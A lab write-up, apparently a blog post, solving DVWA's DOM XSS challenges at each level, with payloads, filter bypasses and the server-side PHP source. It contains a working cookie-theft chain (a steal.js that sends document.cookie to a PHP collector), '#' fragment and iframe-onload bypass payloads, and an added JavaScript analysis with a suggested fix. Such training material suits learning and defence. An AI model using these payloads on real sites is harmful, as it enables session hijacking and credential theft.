[DVWA (VI)] XSS DOM cross-site attacks


DOM cross-site attacks: DOM XSS (DOM Based Cross Site Scripting)

Preface:

DOM, in full the Document Object Model, is a platform- and language-neutral interface that lets programs and scripts dynamically access and update the content, structure and style of a document. DOM XSS is really a special kind of reflected XSS: it is a vulnerability based on the DOM document object model.

The difference between DOM XSS and the two previous cross-site attacks (reflected and stored) is that no data is exchanged with the backend server: the payload is read from the URL and written into the page entirely by client-side script.


low:

1. Observation:

Viewing the HTML code of the pull-down (select) form:

<script>
    if (document.location.href.indexOf("default=") >= 0) {
        var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
        document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
        document.write("<option value='' disabled='disabled'>----</option>");
    }
    document.write("<option value='English'>English</option>");
    document.write("<option value='French'>French</option>");
    document.write("<option value='Spanish'>Spanish</option>");
    document.write("<option value='German'>German</option>");
</script>
<option value="English">English</option>
<option value="" disabled="disabled">----</option>
<option value="English">English</option>
<option value="French">French</option>
<option value="Spanish">Spanish</option>
<option value="German">German</option>

Four options can be found; the default is the English option.

2. Load the URL in HackBar and view it:

The structure is simple: a script can be appended after default=.

3. Try:

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert("test")</script>

Executing it, an alert box pops up.

At this point the HTML contains one more option element.

4. Preparation for stealing the cookie:

In the www folder, continue to use the PHP file and JS file from the previous article:
get_low_dvwa_cookie.php:

<?php

$cookie=$_GET['cookie'];
file_put_contents('get_low_dvwa_cookie.txt',$cookie);

?>

steal.js:

document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie;

5. Add the script:

Add after default=:  <script src="http://127.0.0.1/steal.js"></script>

6. Execution:

The cookie is found to have been captured and stored in the text file.


medium:

1. Try <script>, mixed case, and <scr<script>ipt>:

None of these work: nothing is executed and nothing changes. Viewing the HTML code shows that nothing was inserted into the option, so the script tag must be filtered out.

2. The first method: #

What follows # is not sent to the server, so the server-side filter can be bypassed; the URL becomes

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?#default=<script src="http://127.0.0.1/steal.js"></script>

3. The second method:

Try an iframe tag:

<iframe onload="var b= document.createElement('script'); 
b.setAttribute('src','http://127.0.0.1/steal.js');
document.getElementsByTagName('head')[0].appendChild(b);"
>


The option changed, but nothing executed. Viewing the HTML code shows only the value and no code: the preceding tags were not closed.

4. Close the preceding tags before the iframe:

</option></select><iframe onload="var b= document.createElement('script');
b.setAttribute('src','http://127.0.0.1/steal.js');
document.getElementsByTagName('head')[0].appendChild(b);"
>

Execution succeeds!


high:

1. First try the # bypass:

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?#default=<script src="http://127.0.0.1/steal.js"></script>

Oh ho, it works!

2. Compare the source code of the three levels

Comparing the server-side PHP source code shows the basis for the bypasses above.

low:

<?php

# No protections, anything goes

?> 

No processing at all.
Medium:

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?> 

It first checks whether the input is empty; if not, it is assigned to $default and then checked for a script tag. The check is case-insensitive (stripos), so changing case does not work; but it only sees what the server receives, so it can be bypassed with # or by switching to a different tag.
High:

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?> 

The server only accepts values matching the four options, but it still only validates what it receives, so it is easily bypassed with #.
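To make the gap between the three server-side filters and the page's own client-side script concrete, here is an added example (not part of the write-up and not DVWA's code) that reproduces, in Node.js, the indexOf/substring extraction from the page's <script>, what $_GET['default'] would see for the same URL, ports of the medium and high PHP checks, and an assumed client-side fix (safeClientLang) that applies the same allowlist in the browser and never builds markup from the untrusted string. The function names and the sample URLs are constructed for this example; the allowlist matches the four languages in the high-level switch.

```javascript
// Added example: why the '#' bypass works against the medium and high levels,
// and what a client-side allowlist fix looks like. Not DVWA's own code.

// Client-side extraction, same logic as the page's vulnerable <script>:
// indexOf/substring over the whole href, fragment included.
function clientLang(href) {
  const marker = "default=";
  const i = href.indexOf(marker);
  if (i < 0) return null;
  return href.substring(i + marker.length);
}

// What the server-side PHP $_GET['default'] receives: only the query string.
// The fragment after '#' is never sent, so searchParams cannot see it.
function serverDefault(href) {
  return new URL(href).searchParams.get("default"); // null when absent
}

// Port of the medium-level check: stripos($default, "<script") !== false
function mediumRedirects(value) {
  return value !== null && value.toLowerCase().includes("<script");
}

// Port of the high-level check: anything outside the switch redirects.
const ALLOWED = ["French", "English", "German", "Spanish"];
function highRedirects(value) {
  return value !== null && !ALLOWED.includes(value);
}

// Assumed fix (hypothetical, not DVWA's impossible level): validate in the
// browser against the same allowlist and fall back to English. Because only
// allowlisted strings are ever written, the '#' trick has nothing to inject.
function safeClientLang(href) {
  const raw = clientLang(href);
  if (raw === null) return "English";
  let decoded;
  try {
    decoded = decodeURIComponent(raw);
  } catch (e) {
    return "English"; // malformed percent-encoding is treated as no input
  }
  return ALLOWED.includes(decoded) ? decoded : "English";
}

// One report per URL: what the client script reads, what the server reads,
// whether each server filter would redirect, and what the fixed client uses.
function analyse(href) {
  const server = serverDefault(href);
  return {
    client: clientLang(href),
    server,
    mediumRedirects: mediumRedirects(server),
    highRedirects: highRedirects(server),
    safe: safeClientLang(href),
  };
}

// Constructed sample URLs. In a real browser location.href is percent-encoded,
// and the page's script undoes that with decodeURI; raw strings keep it short.
const BASE = "http://127.0.0.1/dvwa/vulnerabilities/xss_d/";
const SAMPLES = {
  normal: BASE + "?default=English",
  queryScript: BASE + "?default=<script>alert(1)</script>",
  fragmentScript: BASE + "?#default=<script>alert(1)</script>",
  tagSwitch: BASE + '?default=</option></select><iframe onload="alert(1)">',
};

function demo() {
  const out = {};
  for (const [name, href] of Object.entries(SAMPLES)) out[name] = analyse(href);
  return out;
}

console.log(JSON.stringify(demo(), null, 2));
```

In the report, queryScript is caught by the medium filter, tagSwitch slips past medium but not high, and fragmentScript reaches neither filter at all (server sees null) while the client script still extracts the payload; safeClientLang returns "English" for all three, which is the property a DOM XSS fix has to guarantee.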


impossible:

No solution found; viewing the server-side PHP source code:

<?php

# Don't need to do anything, protction handled on the client side

?> 

 


Origin www.cnblogs.com/wayne-tao/p/11084981.html